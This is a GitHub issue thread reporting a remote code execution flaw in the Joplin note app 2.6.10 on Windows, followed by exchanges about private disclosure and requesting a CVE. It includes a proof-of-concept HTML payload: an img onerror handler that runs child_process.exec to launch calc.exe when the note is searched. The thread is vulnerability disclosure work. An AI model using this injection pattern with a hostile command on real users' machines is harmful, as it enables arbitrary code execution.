Remote Code Execution vulnerability

[Anthem-whisper]

Jopin Remote Code Execution

Description

Joplin is powered by Eelectron. When the victim press Ctrl+P to search content, if the payload is near the content(before the content), we can remotely execute any JavaScript code on the victim's computer.

Affected versions of Joplin

Joplin version: Joplin 2.6.10

Platform: Windows

OS specifics: Windows 11

PoC

1. Input the following text to anywhere the search engine of Joplin can search (if you use Linux/macOS, you can replace calc.exe to corresponding command)

wh1sper
<img/src="1"/onerror=eval("require('child_process').exec('calc.exe');");>

2. press Ctrl+P and input wh1sper

[Daeraxa]

When you create an issue on github, one of the options shows how to submit a potential vulnerability rather than opening a ticket.

[Anthem-whisper]

this is a serious security vulnerability, it should not be made public until it is fixed

[Daeraxa]

I didn't say it wasn't. Read the policy which is an option when you try to create a new issue, it shows how to submit a vulnerability.

[Anthem-whisper]

okay

[laurent22]

And probably it's the file:// "vulnerability".

[Anthem-whisper]

I have sent an email, have you received it?

[laurent22]

Yes, thanks, I got it and replied.

[laurent22]

Check your spam folder if you didn't get my email.

[Anthem-whisper]

I have received your email, you said "Do you have a CVE for it? ". you mean "do I need request a CVE"?  I want to Create draft security advisory in Github repository and request a CVE, this requires you to give me permission to "New draft security advisory"  

…

------------------ 原始邮件 ------------------ 发件人: "laurent22/joplin" ***@***.***>; 发送时间: 2022年1月11日(星期二) 晚上11:56 ***@***.***>; ***@***.******@***.***>; 主题: Re: [laurent22/joplin] Remote Code Execution vulnerability (Issue #6004) Check your spam folder if you didn't get my email. — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[Anthem-whisper]

excuse me, I can't understand your mean. Maybe, should I request CVE in https://cveform.mitre.org ?

[laurent22]

The CVE is up to you, we don't deal with this part. And of course it's not required, we'll fix the bug regardless.

[laurent22]

Let's leave the report open actually, so that we can link to it when fixing the issue.